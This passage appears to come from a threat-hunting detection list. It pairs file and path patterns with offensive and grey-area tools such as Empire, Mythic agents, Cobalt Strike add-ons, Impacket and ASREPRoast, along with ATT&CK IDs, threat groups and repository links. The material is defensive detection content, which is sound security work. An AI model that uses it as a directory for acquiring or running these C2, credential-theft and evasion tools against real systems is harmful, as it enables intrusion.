T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - 
APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/v1/campaign/*/implants/*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*/api/v1/implants/*/execute*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*/api/v1/implants/*/responses*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*/api/v2/starkiller*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 
- T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api0cradle/CVE-*,offensive_tool_keyword,POC,CVE-2023-23397 POC Powershell exploit,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/api0cradle/CVE-2023-23397-POC-Powershell,1,1,N/A,N/A,4,340,64,2023-03-17T07:47:40Z,2023-03-16T19:43:39Z -*/Apollo.exe*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/Apollo.git*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/Apollo/Agent/*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/ApolloInterop.*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - 
T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/ApolloInterop/*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/apollon-all-x64*,offensive_tool_keyword,apollon,evade auditd by writing /proc/PID/mem,T1054.001 - T1055.001 - T1012,TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/apollon,1,1,N/A,8,1,13,5,2023-08-21T05:43:36Z,2023-07-31T11:55:43Z -*/apollon-main.zip*,offensive_tool_keyword,apollon,evade auditd by writing /proc/PID/mem,T1054.001 - T1055.001 - T1012,TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/apollon,1,1,N/A,8,1,13,5,2023-08-21T05:43:36Z,2023-07-31T11:55:43Z -*/apollon-selective-x64*,offensive_tool_keyword,apollon,evade auditd by writing /proc/PID/mem,T1054.001 - T1055.001 - T1012,TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/apollon,1,1,N/A,8,1,13,5,2023-08-21T05:43:36Z,2023-07-31T11:55:43Z -*/ApolloTest.exe,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/AppFiles/ipscan.exe*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation 
tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*/aquasecurity/cloudsploit*,offensive_tool_keyword,cloudsploit,CloudSploit by Aqua - Cloud Security Scans,T1526 - T1534 - T1547 - T1078 - T1046,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/aquasecurity/cloudsploit,1,1,N/A,N/A,10,2921,641,2023-09-29T16:35:48Z,2015-06-29T15:33:40Z -*/Ares.git,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,1,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z -*/ares.py *,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,0,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z -*/armitage.git*,offensive_tool_keyword,armitage,Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ,T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002,TA0002 - TA0008 - TA0005 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://github.com/r00t0v3rr1d3/armitage,1,1,N/A,N/A,1,81,15,2022-12-06T00:17:23Z,2022-01-23T17:32:01Z -*/arp_scanner.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/arp_spoof/*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/artifactor.py*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*/ase_docker/*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*/asn-query.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/asprox.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/asprox.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/ASRenum.cpp*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mlcsec/ASRenum-BOF,1,1,N/A,10,10,121,15,2022-12-28T17:27:18Z,2022-12-28T14:41:02Z -*/ASRenum.cs*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. 
and exclusion locations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mlcsec/ASRenum-BOF,1,1,N/A,10,10,121,15,2022-12-28T17:27:18Z,2022-12-28T14:41:02Z -*/ASRenum-BOF*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. 
and exclusion locations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mlcsec/ASRenum-BOF,1,1,N/A,10,10,121,15,2022-12-28T17:27:18Z,2022-12-28T14:41:02Z -*/ASREPRoast*,offensive_tool_keyword,ASREPRoast,Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. 
,T1558.003,TA0006,N/A,N/A,Credential Access,https://github.com/HarmJ0y/ASREPRoast,1,1,N/A,N/A,2,180,57,2018-09-25T03:26:00Z,2017-01-14T21:07:57Z -*/asreproast_hashes_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/ASREProastables.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/assets/bin2uuids_file.py*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*/asyncssh_server.py*,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,1,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*/atexec.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/Athena-*.zip*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Athena.csproj*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Athena.exe*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Athena.Profiles.*.cs*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Athena.Profiles.*.exe*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Athena.Profiles.*.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Athena.sln*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Athena/Assembly/*.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Athena/Commands/*.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/athena/mythic*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
